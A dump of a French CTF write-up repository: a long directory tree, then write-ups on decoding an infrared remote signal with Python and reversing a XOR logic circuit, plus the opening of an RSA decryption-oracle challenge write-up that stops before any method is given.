├── 2020 ├── FCSC │ ├── README.md │ └── hardware │ │ ├── NECessIR │ │ ├── README.md │ │ ├── audacity.png │ │ ├── decode-signal.py │ │ ├── enonce.png │ │ ├── ir-signal.raw │ │ └── ir-signal.wav │ │ └── Quarantaine │ │ ├── README.md │ │ ├── circuit.pdf │ │ ├── enonce.png │ │ └── sketch.png └── H2G2 │ ├── README.md │ ├── crypto │ ├── decryptor.md │ ├── public.pem │ ├── sage1.md │ └── secret │ ├── forensic │ ├── Confidential.jpg │ ├── Confidential.pdf │ ├── exfiltration.md │ ├── exfiltration.pcapng │ ├── flag.txt │ └── ping_pong.md │ ├── misc │ ├── DNA.md │ ├── bases.md │ └── site.png │ └── web │ ├── dedeos.md │ └── shrug.md ├── 2021 ├── ECW │ ├── README.md │ ├── forensics │ │ ├── CONFIDENTIAL.pdf │ │ ├── ECW_chall_JBV.pcapng │ │ ├── Logs │ │ │ ├── Application.evtx │ │ │ ├── HardwareEvents.evtx │ │ │ ├── Internet Explorer.evtx │ │ │ ├── Key Management Service.evtx │ │ │ ├── Microsoft-Client-Licensing-Platform%4Admin.evtx │ │ │ ├── Microsoft-Windows-AAD%4Operational.evtx │ │ │ ├── Microsoft-Windows-AppModel-Runtime%4Admin.evtx │ │ │ ├── Microsoft-Windows-AppReadiness%4Admin.evtx │ │ │ ├── Microsoft-Windows-AppReadiness%4Operational.evtx │ │ │ ├── Microsoft-Windows-AppXDeployment%4Operational.evtx │ │ │ ├── Microsoft-Windows-AppXDeploymentServer%4Operational.evtx │ │ │ ├── Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx │ │ │ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx │ │ │ ├── Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx │ │ │ ├── Microsoft-Windows-Application-Experience%4Program-Inventory.evtx │ │ │ ├── Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx │ │ │ ├── Microsoft-Windows-Application-Experience%4Steps-Recorder.evtx │ │ │ ├── Microsoft-Windows-AppxPackaging%4Operational.evtx │ │ │ ├── Microsoft-Windows-Authentication User Interface%4Operational.evtx │ │ │ ├── Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx │ │ │ ├── Microsoft-Windows-Biometrics%4Operational.evtx │ │ │ ├── Microsoft-Windows-Bits-Client%4Operational.evtx │ │ │ ├── Microsoft-Windows-CloudStore%4Operational.evtx │ │ │ ├── Microsoft-Windows-CodeIntegrity%4Operational.evtx │ │ │ ├── Microsoft-Windows-Containers-Wcifs%4Operational.evtx │ │ │ ├── Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx │ │ │ ├── Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx │ │ │ ├── Microsoft-Windows-Crypto-DPAPI%4Operational.evtx │ │ │ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx │ │ │ ├── Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Operational.evtx │ │ │ ├── Microsoft-Windows-DeviceSetupManager%4Admin.evtx │ │ │ ├── Microsoft-Windows-DeviceSetupManager%4Operational.evtx │ │ │ ├── Microsoft-Windows-Dhcp-Client%4Admin.evtx │ │ │ ├── Microsoft-Windows-Dhcpv6-Client%4Admin.evtx │ │ │ ├── Microsoft-Windows-Diagnosis-DPS%4Operational.evtx │ │ │ ├── Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx │ │ │ ├── Microsoft-Windows-Diagnostics-Performance%4Operational.evtx │ │ │ ├── Microsoft-Windows-FileHistory-Core%4WHC.evtx │ │ │ ├── Microsoft-Windows-GroupPolicy%4Operational.evtx │ │ │ ├── Microsoft-Windows-HelloForBusiness%4Operational.evtx │ │ │ ├── Microsoft-Windows-HotspotAuth%4Operational.evtx │ │ │ ├── Microsoft-Windows-International%4Operational.evtx │ │ │ ├── Microsoft-Windows-Kernel-Boot%4Operational.evtx │ │ │ ├── Microsoft-Windows-Kernel-EventTracing%4Admin.evtx │ │ │ ├── Microsoft-Windows-Kernel-PnP%4Configuration.evtx │ │ │ ├── Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx │ │ │ ├── Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx │ │ │ ├── Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx │ │ │ ├── Microsoft-Windows-Kernel-WHEA%4Errors.evtx │ │ │ ├── Microsoft-Windows-Kernel-WHEA%4Operational.evtx │ │ │ ├── Microsoft-Windows-Known Folders API Service.evtx │ │ │ ├── Microsoft-Windows-LanguagePackSetup%4Operational.evtx │ │ │ ├── Microsoft-Windows-LiveId%4Operational.evtx │ │ │ ├── Microsoft-Windows-MUI%4Admin.evtx │ │ │ ├── Microsoft-Windows-MUI%4Operational.evtx │ │ │ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Admin.evtx │ │ │ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4Autopilot.evtx │ │ │ ├── Microsoft-Windows-ModernDeployment-Diagnostics-Provider%4ManagementService.evtx │ │ │ ├── Microsoft-Windows-NCSI%4Operational.evtx │ │ │ ├── Microsoft-Windows-NetworkProfile%4Operational.evtx │ │ │ ├── Microsoft-Windows-Ntfs%4Operational.evtx │ │ │ ├── Microsoft-Windows-Ntfs%4WHC.evtx │ │ │ ├── Microsoft-Windows-Partition%4Diagnostic.evtx │ │ │ ├── Microsoft-Windows-PowerShell%4Admin.evtx │ │ │ ├── Microsoft-Windows-PowerShell%4Operational.evtx │ │ │ ├── Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx │ │ │ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4Admin.evtx │ │ │ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4AutoPilot.evtx │ │ │ ├── Microsoft-Windows-Provisioning-Diagnostics-Provider%4ManagementService.evtx │ │ │ ├── Microsoft-Windows-PushNotification-Platform%4Admin.evtx │ │ │ ├── Microsoft-Windows-PushNotification-Platform%4Operational.evtx │ │ │ ├── Microsoft-Windows-ReadyBoost%4Operational.evtx │ │ │ ├── Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx │ │ │ ├── Microsoft-Windows-Resource-Exhaustion-Resolver%4Operational.evtx │ │ │ ├── Microsoft-Windows-RestartManager%4Operational.evtx │ │ │ ├── Microsoft-Windows-SMBClient%4Operational.evtx │ │ │ ├── Microsoft-Windows-SMBServer%4Audit.evtx │ │ │ ├── Microsoft-Windows-SMBServer%4Connectivity.evtx │ │ │ ├── Microsoft-Windows-SMBServer%4Operational.evtx │ │ │ ├── Microsoft-Windows-SMBServer%4Security.evtx │ │ │ ├── Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx │ │ │ ├── Microsoft-Windows-Security-Mitigations%4KernelMode.evtx │ │ │ ├── Microsoft-Windows-Security-Mitigations%4UserMode.evtx │ │ │ ├── Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx │ │ │ ├── Microsoft-Windows-SettingSync%4Debug.evtx │ │ │ ├── Microsoft-Windows-SettingSync%4Operational.evtx │ │ │ ├── Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx │ │ │ ├── Microsoft-Windows-Shell-Core%4ActionCenter.evtx │ │ │ ├── Microsoft-Windows-Shell-Core%4AppDefaults.evtx │ │ │ ├── Microsoft-Windows-Shell-Core%4LogonTasksChannel.evtx │ │ │ ├── Microsoft-Windows-Shell-Core%4Operational.evtx │ │ │ ├── Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx │ │ │ ├── Microsoft-Windows-SmbClient%4Audit.evtx │ │ │ ├── Microsoft-Windows-SmbClient%4Connectivity.evtx │ │ │ ├── Microsoft-Windows-SmbClient%4Security.evtx │ │ │ ├── Microsoft-Windows-StateRepository%4Operational.evtx │ │ │ ├── Microsoft-Windows-StateRepository%4Restricted.evtx │ │ │ ├── Microsoft-Windows-Storage-ClassPnP%4Operational.evtx │ │ │ ├── Microsoft-Windows-Storage-Storport%4Health.evtx │ │ │ ├── Microsoft-Windows-Storage-Storport%4Operational.evtx │ │ │ ├── Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx │ │ │ ├── Microsoft-Windows-Store%4Operational.evtx │ │ │ ├── Microsoft-Windows-Storsvc%4Diagnostic.evtx │ │ │ ├── Microsoft-Windows-TWinUI%4Operational.evtx │ │ │ ├── Microsoft-Windows-TaskScheduler%4Maintenance.evtx │ │ │ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx │ │ │ ├── Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx │ │ │ ├── Microsoft-Windows-Time-Service%4Operational.evtx │ │ │ ├── Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx │ │ │ ├── Microsoft-Windows-User Device Registration%4Admin.evtx │ │ │ ├── Microsoft-Windows-User Profile Service%4Operational.evtx │ │ │ ├── Microsoft-Windows-UserPnp%4ActionCenter.evtx │ │ │ ├── Microsoft-Windows-UserPnp%4DeviceInstall.evtx │ │ │ ├── Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx │ │ │ ├── Microsoft-Windows-WER-PayloadHealth%4Operational.evtx │ │ │ ├── Microsoft-Windows-WMI-Activity%4Operational.evtx │ │ │ ├── Microsoft-Windows-WPD-ClassInstaller%4Operational.evtx │ │ │ ├── Microsoft-Windows-Wcmsvc%4Operational.evtx │ │ │ ├── Microsoft-Windows-WebAuthN%4Operational.evtx │ │ │ ├── Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx │ │ │ ├── Microsoft-Windows-WinRM%4Operational.evtx │ │ │ ├── Microsoft-Windows-Windows Defender%4Operational.evtx │ │ │ ├── Microsoft-Windows-Windows Defender%4WHC.evtx │ │ │ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx │ │ │ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx │ │ │ ├── Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx │ │ │ ├── Microsoft-Windows-WindowsBackup%4ActionCenter.evtx │ │ │ ├── Microsoft-Windows-WindowsUpdateClient%4Operational.evtx │ │ │ ├── Microsoft-Windows-Winlogon%4Operational.evtx │ │ │ ├── Microsoft-Windows-WorkFolders%4WHC.evtx │ │ │ ├── OAlerts.evtx │ │ │ ├── Parameters.evtx │ │ │ ├── Security.evtx │ │ │ ├── Setup.evtx │ │ │ ├── State.evtx │ │ │ ├── System.evtx │ │ │ ├── Windows PowerShell.evtx │ │ │ └── microsoft-windows-diagnosis-scripted%4operational.evtx │ │ ├── NightlyPlanet.md │ │ ├── ResponseTeam.md │ │ ├── lite.pcapng │ │ ├── rt1 │ │ │ ├── Readme.txt │ │ │ └── access.log │ │ └── solve.py │ └── pentest │ │ ├── RedTeam.md │ │ └── redteam │ │ └── notes.txt ├── FCSC │ ├── README.md │ ├── crypto │ │ └── rsa-destroyer │ │ │ ├── README.md │ │ │ ├── output.txt │ │ │ └── rsa_destroyer.py │ ├── forensic │ │ └── malware1 │ │ │ └── README.md │ ├── hardware │ │ ├── BABA │ │ │ ├── Figure_1.png │ │ │ ├── Figure_2.png │ │ │ └── README.md │ │ └── phase-a-phase │ │ │ ├── Figure_1.png │ │ │ ├── README.md │ │ │ ├── bpsk.gif │ │ │ └── challenge.iq │ ├── misc │ │ ├── privesec_me1 │ │ │ └── README.md │ │ ├── ventriglisse │ │ │ ├── README.md │ │ │ ├── final.py │ │ │ ├── maze.png │ │ │ ├── maze_final.png │ │ │ └── solve.py │ │ └── whois │ │ │ ├── README.md │ │ │ ├── screen.png │ │ │ └── screen2.png │ └── reverse │ │ └── jakarta │ │ ├── Jakarta.apk │ │ ├── README.md │ │ └── jadx.png └── phack │ ├── README.md │ ├── forensic │ ├── TranscodedWallpaper.jpg │ ├── android.md │ ├── chall.zip │ ├── git.md │ └── piraterie.md │ ├── misc │ ├── amazing.md │ ├── data.zip │ └── qrcode.md │ ├── reseau │ ├── dump.pcapng │ ├── dump2.pcapng │ ├── nom-domaine.md │ ├── ping-pong.md │ ├── portes-ouvertes.md │ ├── sublime-text.gif │ ├── tenet.md │ ├── tenet.pcapng │ └── thief.md │ ├── reverse │ ├── no-stings │ └── nostrings.md │ ├── stegano │ ├── aliens.md │ ├── alter_egg-o.md │ ├── altered.png │ ├── altered2.png │ ├── audacity.gif │ ├── caumunikassion.md │ ├── phack_white.png │ └── weird.wav │ ├── systeme │ ├── graduated.md │ ├── sudoku-v2.md │ ├── sudoku.md │ └── to-be-or-not.md │ └── web │ └── phactory.md ├── 2022 ├── FCSC │ ├── README.md │ ├── challenges.png │ ├── crypto │ │ ├── hashish │ │ │ ├── README.md │ │ │ └── hashish.py │ │ └── shuffled │ │ │ ├── README.md │ │ │ ├── output.txt │ │ │ └── shuffled.py │ ├── forensics │ │ ├── a_lancienne │ │ │ ├── README.md │ │ │ ├── cap │ │ │ └── file3_crop.png │ │ ├── c3po │ │ │ ├── README.md │ │ │ └── flag.png │ │ └── echec_op │ │ │ └── README.md │ ├── hardware │ │ ├── daddy_morse │ │ │ ├── README.md │ │ │ ├── client.py │ │ │ ├── diff.png │ │ │ ├── enonce.png │ │ │ ├── server.py │ │ │ ├── signal.iq │ │ │ ├── signal.png │ │ │ ├── signal2.iq │ │ │ ├── workflow.png │ │ │ └── workflow2.png │ │ ├── i2c │ │ │ ├── README.md │ │ │ ├── capture.vcd │ │ │ └── gtkwave.png │ │ ├── mommy_morse │ │ │ ├── README.md │ │ │ ├── client.py │ │ │ ├── enonce.png │ │ │ ├── out.iq │ │ │ ├── server.py │ │ │ ├── signal.iq │ │ │ ├── signal.png │ │ │ ├── solve.py │ │ │ ├── worflow.png │ │ │ └── workflow.grc │ │ ├── qui_est_ce │ │ │ ├── README.md │ │ │ ├── circuit.pdf │ │ │ ├── enonce.png │ │ │ └── extrait.png │ │ └── xfactor │ │ │ ├── notes.txt │ │ │ └── solve.py │ ├── matrice_junior.png │ ├── misc │ │ └── guessme2 │ │ │ ├── README.md │ │ │ └── guessmetoo.py │ ├── side_channel │ │ ├── nscnm │ │ │ ├── README.md │ │ │ ├── nscnm.py │ │ │ ├── slide1.png │ │ │ └── slide2.png │ │ └── nscns │ │ │ ├── README.md │ │ │ ├── nscns.py │ │ │ └── solve.py │ ├── top100_general.png │ ├── top100_junior.png │ └── top3_categories.png ├── dghack │ ├── README.md │ └── detection │ │ └── piratecraft │ │ ├── Exploit.java │ │ ├── Exploit84686564564857543.class │ │ ├── README.md │ │ ├── Solve.java │ │ ├── cap.pcap │ │ ├── image-20221110122739596.png │ │ ├── image-20221110124643515.png │ │ ├── image-20221110143932122.png │ │ ├── image-20221116171431906.png │ │ └── poc.pcapng └── interiut │ ├── README.md │ ├── forensics │ ├── README.md │ ├── image-20220515145942879.png │ ├── image-20220515151720063.png │ ├── image-20220515152334399.png │ ├── image-20220515160319964.png │ ├── image-20220515163851506.png │ └── image-20220515174903972.png │ ├── image-20220521183334291.png │ └── image-20220521185017527.png ├── 2024 ├── breizhctf │ └── mobile │ │ └── ownapp │ │ ├── README.md │ │ ├── image-1.png │ │ ├── image-2.png │ │ ├── image-3.png │ │ ├── image-4.png │ │ ├── image.png │ │ └── ownapp.apk └── htb_univ │ └── forensics_signaling-victorious │ ├── README.md │ └── assets │ ├── image-20241215181811526.png │ ├── image-20241215182134323.png │ ├── image-20241215182405766.png │ ├── image-20241215182740124.png │ ├── image-20241215183100123.png │ ├── image-20241215183552789.png │ ├── image-20241215183836783.png │ ├── image-20241215185845638.png │ ├── image-20241215190801010.png │ ├── image-20241215191822053.png │ ├── image-20241215191957427.png │ ├── image-20241215192417004.png │ ├── image-20241215193603387.png │ ├── image-20241215194027198.png │ ├── image-20241215194218975.png │ ├── image-20241215195244276.png │ ├── image-20241215200443817.png │ ├── image-20241215201011315.png │ ├── image-20241215201230387.png │ ├── image-20241215201813864.png │ ├── image-20241215202035230.png │ ├── image-20241215202042977.png │ └── image-20241215203829680.png └── README.md /2020/FCSC/README.md: -------------------------------------------------------------------------------- 1 | # France Cybersecurity Challenge 2020 2 | 3 | Le FCSC est organisé tous les ans par l'ANSSI pour sélectionner les membres qui composeront l'équipe de France lors l'European Cybersecurity Challenge (ECSC). 4 | 5 | ### hardware 6 | * [Quarantaine - 25 pts](./hardware/Quarantaine/) 7 | * [NECessIR - 44 pts](./hardware/NECessIR/) 8 | -------------------------------------------------------------------------------- /2020/FCSC/hardware/NECessIR/README.md: -------------------------------------------------------------------------------- 1 | # NECessIR - 44 pts - 76 solves 2 | 3 | Voici l'énoncé : 4 | 5 |  6 | 7 | Commençons par faire des recherches sur les télécommandes infra-rouges. On tombe rapidement sur [ce site](https://www.electroschematics.com/ir-decoder-encoder-part-1/). L'explication est très claire : la LED IR s'allume 9 ms (c'est le *burst*) pour dire qu'elle va commencer puis fait une pause de 4,5 ms avant l'envoi des données bit par bit. Le bit est défini par la distance temporelle entre deux pulsions. Une distance de 1,125 ms correspond a un `0` et une distance de 2,25 ms sorrespond à un `1`. 8 | 9 | Essayons donc d'ouvrir le fichier. On ouvre Audacity et dans le menu `Fichier` on choisit `Importer` puis `Données brutes (Raw)`. Ensuite on sélectionne notre fichier. Pour choisir les bonnes options il faut regarder la commande `arecord`. Un petit `man arecord` nous indique que `-r192000` signifie que le taux d'échantillonage est de 192 000 Hz, `-c1` signifie que le son est mono (un seul canal) et `S16_BE` désigne des entiers signés 16 bits encodés en [big-endian](https://fr.wikipedia.org/wiki/Boutisme). 10 | 11 | On obtient alors un signal composé de 4 *blocs*. En zoomant sur le début du premier bloc, on voit qu'il commence bien par un *burst* puis est constitué de pics espacés par une distance non constante. 12 | 13 |  14 | 15 | Exportons le fichier en `.wav` pour l'analyser en Python. 16 | 17 | ```Python 18 | import scipy.io.wavfile 19 | 20 | _, data = scipy.io.wavfile.read('ir-signal.wav') 21 | rate = 192 # f/ms 22 | ``` 23 | 24 | Le tableau `data` contient des entiers allant de -30000 à 30000 environ. Commençons par mesurer la durée du burst. Le principe consiste à faire une moyenne glissante des valeurs absolues de 5 entiers puis de voir si cette moyenne est supérieure à 100 pour savoir si on a un signal ou non. 25 | 26 | ```Python 27 | offset = 0 28 | moy = 1000 29 | while moy > 100: 30 | moy = 0 31 | for i in range(5) : moy += abs(data[offset+i]) 32 | moy /= 5 33 | offset += 5 34 | 35 | print("burst de", offset/rate, "ms") 36 | ``` 37 | Ce qui donne `burst de 8.958333333333334 ms`. Cela correspond aux 9 ms du site. 38 | 39 | Faisons une boucle qui affiche le temps entre chaque signal. 40 | 41 | ```Python 42 | offset = 0 43 | while True : 44 | print () 45 | delta = 0 46 | moy = 1000 47 | while moy > 100: 48 | moy = 0 49 | for i in range(5) : moy += abs(data[offset+delta+i]) 50 | moy /= 5 51 | delta += 5 52 | 53 | print("pic de", round(delta/rate, 1), "ms") 54 | 55 | offset += delta 56 | 57 | delta = 0 58 | moy = 0 59 | while moy < 100: 60 | moy = 0 61 | for i in range(5) : moy += abs(data[offset+delta+i]) 62 | moy /= 5 63 | delta += 5 64 | 65 | print("pause de", round(delta/rate, 1), "ms") 66 | 67 | offset += delta 68 | ``` 69 | 70 | On obtient : 71 | ``` 72 | pic de 9.0 ms 73 | pause de 4.4 ms 74 | 75 | pic de 0.6 ms 76 | pause de 0.5 ms 77 | 78 | pic de 0.6 ms 79 | pause de 1.7 ms 80 | 81 | pic de 0.6 ms 82 | pause de 0.5 ms 83 | 84 | pic de 0.6 ms 85 | pause de 0.5 ms 86 | 87 | pic de 0.6 ms 88 | pause de 0.5 ms 89 | 90 | pic de 0.6 ms 91 | pause de 1.7 ms 92 | 93 | pic de 0.6 ms 94 | pause de 1.6 ms 95 | ``` 96 | et ainsi de suite... 97 | 98 | Après le burst, la longueur des pics est constante mais la pause varie de 0,5 ms à 1,7 ms. Cela diffère de ce qu'on attendait mais on nous dit bien que la télécommande a été modifiée. 99 | 100 | Ne reste plus qu'à créer une variable qui va contenir les bits selon le temps de pause et qui va analyser les quatres blocs. Le programme final est disponible ici : [decode-signal.py](./decode-signal.py). Et il affiche bien le flag ! 101 | -------------------------------------------------------------------------------- /2020/FCSC/hardware/NECessIR/audacity.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/NECessIR/audacity.png -------------------------------------------------------------------------------- /2020/FCSC/hardware/NECessIR/decode-signal.py: -------------------------------------------------------------------------------- 1 | import scipy.io.wavfile 2 | 3 | _, data = scipy.io.wavfile.read('ir-signal.wav') 4 | rate = 192 # f/ms 5 | 6 | offset = 0 7 | 8 | for _ in range(4) : 9 | delta = 0 10 | moy = 1000 11 | while moy > 100: 12 | moy = 0 13 | for i in range(5) : moy += abs(data[offset+delta+i]) 14 | moy /= 5 15 | delta += 5 16 | 17 | print ("burst de", round(delta/rate, 2), "ms (", offset, offset+delta, ")") 18 | 19 | offset += delta 20 | delta = 0 21 | moy = 0 22 | while moy < 100: 23 | moy = 0 24 | for i in range(5) : moy += abs(data[offset+delta+i]) 25 | moy /= 5 26 | delta += 5 27 | 28 | #print ("pause de", round(delta/rate, 2), "ms (", offset, offset+delta, ")") 29 | 30 | offset += delta 31 | bits = "0" 32 | while True : 33 | delta = 0 34 | moy = 1000 35 | while moy > 100: 36 | moy = 0 37 | for i in range(5) : moy += abs(data[offset+delta+i]) 38 | moy /= 5 39 | delta += 5 40 | 41 | t1 = round(delta/rate, 2) 42 | #print (" pic de ", t1, "ms (", offset, offset+delta, ")") 43 | 44 | offset += delta 45 | 46 | delta = 0 47 | moy = 0 48 | while moy < 100: 49 | if offset+delta+5 > len(data): 50 | break 51 | moy = 0 52 | for i in range(5) : moy += abs(data[offset+delta+i]) 53 | moy /= 5 54 | delta += 5 55 | 56 | t2 = round(delta/rate, 2) 57 | #print ("pause de", t2, "ms (", offset, offset+delta, ")") 58 | 59 | if 0.4 <= t1 <= 0.6: 60 | if 0.4 <= t2 <= 0.6 : 61 | bits += "0" 62 | elif 1.5 <= t2 <= 1.7 : 63 | bits += "1" 64 | 65 | elif 1.1 <= t1 <= 1.2 : 66 | print (int(bits, base=2).to_bytes(len(bits)//8, byteorder='big').decode()) 67 | bits = "" 68 | offset += delta 69 | break 70 | 71 | offset += delta 72 | -------------------------------------------------------------------------------- /2020/FCSC/hardware/NECessIR/enonce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/NECessIR/enonce.png -------------------------------------------------------------------------------- /2020/FCSC/hardware/NECessIR/ir-signal.raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/NECessIR/ir-signal.raw -------------------------------------------------------------------------------- /2020/FCSC/hardware/NECessIR/ir-signal.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/NECessIR/ir-signal.wav -------------------------------------------------------------------------------- /2020/FCSC/hardware/Quarantaine/README.md: -------------------------------------------------------------------------------- 1 | # Quarantaine - 25 pts - 157 solves 2 | 3 | Voici l'énoncé : 4 | 5 |  6 | 7 | Je vais utiliser un outil en ligne pour convertir le PDF en JPG et je vais l'analyser avec... GIMP pour pouvoir faire des points de couleur. 8 | 9 | Ce circuit paraît à première vue très complexe : 40 entrées, 40 sorties et plein de portes compliquées. Mais on se rend vite compte que c'est le même bloc qui est copié partout. Après un rapide tour sur [Wikipedia](https://fr.wikipedia.org/wiki/Fonction_logique#Repr%C3%A9sentation_graphique) pour me remémorer les symboles, je fais la table de vérité du bloc récurent à droite. Il n'y a que deux entrées dont 4 combinaisons à tester, cela va vite avec GIMP et mes points rouges et bleus. On obtient la table de vérité suivante : 10 | | e0 | e1 | s0 | 11 | |:--:|:--:|:--:| 12 | | 0 | 0 | 0 | 13 | | 0 | 1 | 1 | 14 | | 1 | 0 | 1 | 15 | | 1 | 1 | 0 | 16 | 17 | On peut donc simplifier ce gros bloc par un simple XOR ! 18 | 19 | On répète l'opération avec le bloc récurent à gauche (qui lui a deux sorties) et l'on obtient cela : 20 | | e0 | e1 | s0 | s1 | 21 | |:--:|:--:|:--:|:--:| 22 | | 0 | 0 | 0 | 0 | 23 | | 0 | 1 | 1 | 0 | 24 | | 1 | 0 | 0 | 1 | 25 | | 1 | 1 | 1 | 1 | 26 | 27 | Cela revient donc simplement à croiser les fils ! 28 | 29 | Le circuit est grandement simplifié mais il faut remarquer autre chose. 30 | 31 | On constate que `x0` est xoré à lui-même. Cela fait donc forcément `0` ! On peut donc compléter une bonne partie du circuit qui est constante. Voici un gribouiboui qui résumé le début (rouge pour les `1` et bleu pour les `0`) : 32 |  33 | 34 | 35 | Ensuite, le bloc en `x39` est presque identique au bloc récurent de droite mais sans l'inverseur final, c'est donc un NXOR. `x39 NXOR x39` cela fait forcément `1` donc on peut de nouveau compléter tout ce qui est lié au fil sortant de ce bloc. 36 | 37 | On se rend compte que des inverseurs sont répartis le long de ces fils à valeur constante ce qui fait qu'un signal constant entre dans chaque XOR à droite. Et cela fait comme une clé que l'on XOR aux bits de `x` mais après les avoir légèrement mélanger. Cela fait : 38 | 39 | ``` 40 | y0 = x0 ^ 0 41 | y1 = x2 ^ 0 42 | y2 = x1 ^ 0 43 | y3 = x4 ^ 0 44 | y4 = x3 ^ 0 45 | y5 = x6 ^ 1 46 | y6 = x5 ^ 1 47 | y7 = x8 ^ 1 48 | y8 = x7 ^ 1 49 | y9 = x10 ^ 1 50 | y10 = x9 ^ 1 51 | ``` 52 | 53 | On pourrait continuer ainsi mais c'est long et chiant donc on va faire un script. 54 | 55 | La clé constante est `0000011111101101010100101101111011100001`, de haut en bas. Le script simulant tout le circuit est donc : 56 | ```Python 57 | x = [int(b) for b in "{:040b}".format(int(input("> ")))[::-1]] 58 | y = [int(b) for b in "0"*40] 59 | 60 | key = [int(b) for b in "0000011111101101010100101101111011100001"] 61 | 62 | for i in range(40): 63 | if i == 0 or i == 39 : 64 | y[i] = x[i] ^ key[i] 65 | elif i%2 == 0: 66 | y[i] = x[i-1] ^ key[i] 67 | else: 68 | y[i] = x[i+1] ^ key[i] 69 | 70 | print(int("".join([str(i) for i in y])[::-1], base=2)) 71 | ``` 72 | 73 | On peut essayer et l'on retrouve bien `f(19) = 581889079277` ! 74 | 75 | Il ne reste plus qu'à faire un script qui fait le processus à l'envers : 76 | ```Python 77 | y = [int(b) for b in "{:040b}".format(int(input("> ")))[::-1]] 78 | x = [int(b) for b in "0"*40] 79 | 80 | key = [int(b) for b in "0000011111101101010100101101111011100001"] 81 | 82 | for i in range(40): 83 | if i == 0 or i == 39 : 84 | x[i] = y[i] ^ key[i] 85 | elif i%2 == 0: 86 | x[i] = y[i-1] ^ key[i-1] 87 | else: 88 | x[i] = y[i+1] ^ key[i+1] 89 | 90 | print(int("".join([str(i) for i in x])[::-1], base=2)) 91 | ``` 92 | 93 | Et ça marche ! 94 | 95 | -------------------------------------------------------------------------------- /2020/FCSC/hardware/Quarantaine/circuit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/Quarantaine/circuit.pdf -------------------------------------------------------------------------------- /2020/FCSC/hardware/Quarantaine/enonce.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/Quarantaine/enonce.png -------------------------------------------------------------------------------- /2020/FCSC/hardware/Quarantaine/sketch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ribt/writeups/4d8976894e3ce18f70cb0c64b04651b237f7ba76/2020/FCSC/hardware/Quarantaine/sketch.png -------------------------------------------------------------------------------- /2020/H2G2/README.md: -------------------------------------------------------------------------------- 1 | # Hack2G2 2020 - CTF InterIUT 2 | 3 | 4 | 5 | Hack2G2 est une association montée par les étudiants de l'ENSIBS et de l'IUT informatique de Vannes. Ils organisent tous les ans un CTF destiné aux étudiants qui débutent en cyber-sécurité. 6 | 7 | ### Forensic 8 | 9 | * [Exfiltration 1, 2 et 3 - 350 pts](./forensic/exfiltration.md) 10 | 11 | ### Misc 12 | 13 | * [D.N.A. - 20 pts](./misc/DNA.md) 14 | * [1110011 1100001 1101100 1110101 1110100 - 20 pts](./misc/bases.md) 15 | 16 | ### Crypto 17 | 18 | - [Le SAGE doré - 20 pts](./crypto/sage1.md) 19 | - [Decryptor - 50 pts](./crypto/decryptor.md) 20 | 21 | ### Web 22 | 23 | - [DéDéOS 1, 2 et 3 - 80 pts](./web/dedeos.md) 24 | - [:shrug: - 20 pts](./web/shrug.md) -------------------------------------------------------------------------------- /2020/H2G2/crypto/decryptor.md: -------------------------------------------------------------------------------- 1 | # Decryptor - 50 pts 2 | 3 | > Un secret chiffré par le serveur suivant à été intercepté. D'apès les premières analyses de nos experts, ce serveur déchiffre tous ce que vous lui donnez, sauf le flag chiffré ! Nous avons besoin de vous pour réussir à tout de même déchiffrer ce secret ! 4 | > 5 | > decryptor.interiut.ctf:1337 6 | > 7 | > - [public.pem](./public.pem) 8 | > - [secret](./secret) 9 | 10 | Nous avons une clé RSA publique et un nombre à décrypter. La clé fait 2048 bits, il est illusoire d'imaginer la casser. 11 | 12 | Il faut probablement chercher du côté du serveur que l'on nous fournit et qui déchiffre tous les messages que l'on veut sauf notre numéro `secret` qui correspond au flag chiffré. Essayons de 